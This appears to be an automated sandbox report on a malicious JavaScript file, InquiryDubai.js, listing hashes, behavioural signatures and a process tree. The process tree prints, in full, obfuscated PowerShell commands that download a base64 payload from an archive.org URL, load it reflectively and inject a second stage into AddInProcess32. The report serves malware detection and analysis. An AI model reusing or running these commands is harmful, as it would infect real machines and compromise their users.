Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-09-2024 02:56
Static task
static1
Behavioral task
behavioral1
Sample
InquiryDubai.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
InquiryDubai.js
Resource
win10v2004-20240802-en
General
-
Target
InquiryDubai.js
-
Size
320KB
-
MD5
b54f5c7cb5ac3d69127941e40966ab0c
-
SHA1
c75973c8bee061c5e4994e2e9da6ebb830719e31
-
SHA256
228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457
-
SHA512
26b0b14d52ed23906448121c2078e032fda790df95cd27c49a888fba3b17f725d494fc89298a6a99e795faa594de1ea4739a113331129bc3395f22a387f53987
-
SSDEEP
6144:6Xx8rS9pLPEFSkgJisDKPdGuoKeM4k6iPrjt5DiqVAo2JIF1wS8TeBVDm6T3ViZ5:wx2spLPEFSkUisDKVA5k6arjLDi2PmCC
Malware Config
Extracted
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2064 powershell.exe 6 2064 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2064 powershell.exe 2472 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2472 powershell.exe 2064 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1916 wrote to memory of 2472 1916 wscript.exe 31 PID 1916 wrote to memory of 2472 1916 wscript.exe 31 PID 1916 wrote to memory of 2472 1916 wscript.exe 31 PID 2472 wrote to memory of 2064 2472 powershell.exe 33 PID 2472 wrote to memory of 2064 2472 powershell.exe 33 PID 2472 wrote to memory of 2064 2472 powershell.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\InquiryDubai.js1⤵
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAMwB6ACcAKwAnAHUAcgBsACAAPQAgAGgAaQB6AGgAdAB0AHAAcwA6AC8ALwAnACsAJwBpAGEAJwArACcAOQAwACcAKwAnADQANgAwADEALgB1AHMALgBhAHIAYwBoAGkAdgBlAC4AJwArACcAbwByAGcALwA2AC8AaQAnACsAJwB0AGUAbQBzAC8AZABlAHQAJwArACcAYQBoAC0AbgBvAHQAZQAtACcAKwAnAGoAJwArACcALwAnACsAJwBEACcAKwAnAGUAdABhAGgATgBvAHQAZQBKACcAKwAnAC4AdAB4AHQAJwArACcAaABpAHoAJwArACcAOwBFACcAKwAnADMAegAnACsAJwBiACcAKwAnAGEAcwBlACcAKwAnADYANABDACcAKwAnAG8AbgB0AGUAbgB0ACcAKwAnACAAPQAnACsAJwAgACgATgAnACsAJwBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAJwArACcAdAAgAFMAeQAnACsAJwBzAHQAZQBtAC4ATgAnACsAJwBlAHQALgBXAGUAJwArACcAYgBDAGwAJwArACcAaQBlACcAKwAnAG4AdAApAC4ARABvAHcAbgAnACsAJwBsAG8AJwArACcAYQBkAFMAdAByAGkAbgBnACgAJwArACcARQAzAHoAJwArACcAdQByAGwAKQA7AEUAMwB6ACcAKwAnAGIAaQBuAGEAcgB5AEMAbwBuAHQAJwArACcAZQBuAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuACcAKwAnAHYAZQAnACsAJwByAHQAXQA6ADoARgByAG8AbQAnACsAJwBCAGEAcwAnACsAJwBlADYANABTAHQAcgBpAG4AZwAnACsAJwAoAEUAMwB6AGIAYQBzAGUANgAnACsAJwA0AEMAbwBuAHQAZQBuAHQAKQA7AEUAMwAnACsAJwB6AGEAcwBzAGUAJwArACcAbQBiAGwAeQAgAD0AIAAnACsAJwBbAFIAZQAnACsAJwBmAGwAZQAnACsAJwBjAHQAaQBvAG4ALgBBAHMAcwBlACcAKwAnAG0AYgBsAHkAXQA6ACcAKwAnADoATABvAGEAZAAoACcAKwAnAEUAMwB6AGIAaQBuAGEAcgB5AEMAbwAnACsAJwBuACcAKwAnAHQAZQAnACsAJwBuAHQAKQA7AEUAMwB6AHQAeQAnACsAJwBwAGUAIAAnACsAJwA9ACcAKwAnACAARQAzAHoAJwArACcAYQBzACcAKwAnAHMAZQBtACcAKwAnAGIAbAB5ACcAKwAnAC4ARwAnACsAJwBlAHQAVAB5AHAAZQAnACsAJwAoAGgAJwArACcAaQB6AFIAdQBuAFAARQAuAEgAbwBtAGUAaABpAHoAJwArACcAKQAnACsAJwA7AEUAMwB6ACcAKwAnAG0AZQB0AGgAJwArACcAbwBkACcAKwAnACAAPQAgAEUAMwB6AHQAeQAnACsAJwBwAGUALgBHACcAKwAnAGUAdABNAGUAdAAnACsAJwBoACcAKwAnAG8AJwArACcAZAAoAGgAaQB6AFYAQQAnACsAJwBJACcAKwAnAGgAaQB6ACkAJwArACcAOwBFADMAegBtACcAKwAnAGUAdABoAG8AZAAuAEkAbgB2AG8AJwArACcAawBlACgARQAzAHoAbgB1AGwAbAAnACsAJwAsACcAKwAnACAAJwArACcAWwBvAGIAagBlACcAKwAnAGMAJwArACcAdABbACcAKwAnAF0AXQAnACsAJwBAACcAKwAnACgAaABpAHoAdAAnACsAJwB4AHQALgA5ADkAMQAvACcAKwAnAHYAJwArACcAZQAnACsAJwBkAC4AJwArACcAMgByACcAKwAnAC4ANAA3ACcAKwAnAGEAZgAzACcAKwAnADIAYQBlAGMAOABlACcAKwAnADYAJwArACcAMABhADcAOAAyADcAOQA0ADYAJwArACcAMAAzACcAKwAnAGMAMABiADEAMwA0AGMAOQAzAC0AJwArACcAYgB1AHAAJwArACcALwAvADoAcwBwAHQAdAAnACsAJwBoACcAKwAnAGgAJwArACcAaQAnACsAJwB6ACAALAAgAGgAaQAnACsAJwB6AGQAZQBzAGEAdABpACcAKwAnAHYAYQBkAG8AaABpACcAKwAnAHoAIAAsACAAaABpAHoAJwArACcAZABlAHMAJwArACcAYQB0AGkAdgBhACcAKwAnAGQAbwBoAGkAegAgACwAJwArACcAIABoAGkAegBkAGUAJwArACcAcwBhAHQAaQAnACsAJwB2AGEAZAAnACsAJwBvAGgAaQAnACsAJwB6ACcAKwAnACwAJwArACcAaABpAHoAJwArACcAQQBkACcAKwAnAGQASQBuAFAAcgAnACsAJwBvAGMAZQBzACcAKwAnAHMAJwArACcAMwAyAGgAJwArACcAaQB6ACwAaABpAHoAJwArACcAZABlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBoAGkAJwArACcAegApACcAKwAnACkAJwArACcAOwAnACkALgBSAEUAUABsAEEAQwBFACgAKABbAGMASABhAFIAXQA2ADkAKwBbAGMASABhAFIAXQA1ADEAKwBbAGMASABhAFIAXQAxADIAMgApACwAJwAkACcAKQAuAFIARQBQAGwAQQBDAEUAKAAoAFsAYwBIAGEAUgBdADEAMAA0ACsAWwBjAEgAYQBSAF0AMQAwADUAKwBbAGMASABhAFIAXQAxADIAMgApACwAWwBzAHQAcgBJAE4AZwBdAFsAYwBIAGEAUgBdADMAOQApACAAfAAmACAAKAAgACQARQBOAHYAOgBDAE8AbQBTAHAARQBDAFsANAAsADIANAAsADIANQBdAC0AagBPAEkATgAnACcAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('E3z'+'url = hizhttps://'+'ia'+'90'+'4601.us.archive.'+'org/6/i'+'tems/det'+'ah-note-'+'j'+'/'+'D'+'etahNoteJ'+'.txt'+'hiz'+';E'+'3z'+'b'+'ase'+'64C'+'ontent'+' ='+' (N'+'ew-Ob'+'j'+'ec'+'t Sy'+'stem.N'+'et.We'+'bCl'+'ie'+'nt).Down'+'lo'+'adString('+'E3z'+'url);E3z'+'binaryCont'+'ent = [System.Con'+'ve'+'rt]::From'+'Bas'+'e64String'+'(E3zbase6'+'4Content);E3'+'zasse'+'mbly = '+'[Re'+'fle'+'ction.Asse'+'mbly]:'+':Load('+'E3zbinaryCo'+'n'+'te'+'nt);E3zty'+'pe '+'='+' E3z'+'as'+'sem'+'bly'+'.G'+'etType'+'(h'+'izRunPE.Homehiz'+')'+';E3z'+'meth'+'od'+' = E3zty'+'pe.G'+'etMet'+'h'+'o'+'d(hizVA'+'I'+'hiz)'+';E3zm'+'ethod.Invo'+'ke(E3znull'+','+' '+'[obje'+'c'+'t['+']]'+'@'+'(hizt'+'xt.991/'+'v'+'e'+'d.'+'2r'+'.47'+'af3'+'2aec8e'+'6'+'0a7827946'+'03'+'c0b134c93-'+'bup'+'//:sptt'+'h'+'h'+'i'+'z , hi'+'zdesati'+'vadohi'+'z , hiz'+'des'+'ativa'+'dohiz ,'+' hizde'+'sati'+'vad'+'ohi'+'z'+','+'hiz'+'Ad'+'dInPr'+'oces'+'s'+'32h'+'iz,hiz'+'desativa'+'dohi'+'z)'+')'+';').REPlACE(([cHaR]69+[cHaR]51+[cHaR]122),'$').REPlACE(([cHaR]104+[cHaR]105+[cHaR]122),[strINg][cHaR]39) |& ( $ENv:COmSpEC[4,24,25]-jOIN'')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d864cf3cb4830a17ca75bab6cde4f83f
SHA1db38485f051e0c9e966476a9de35d22be27ff2f9
SHA25640d28e7d9b050b155f572ade71ff06f752b43a23bd47e4d228a6c8d97bbb7864
SHA5120946f711361f480fd3d264d4c36fe3000f01f9e780f7068ab6412d8e2efcaaf8d8747e9f9b89b1438226c802f0ed1acec1a996a9529a1ab6c6c8a20f64c2bd9b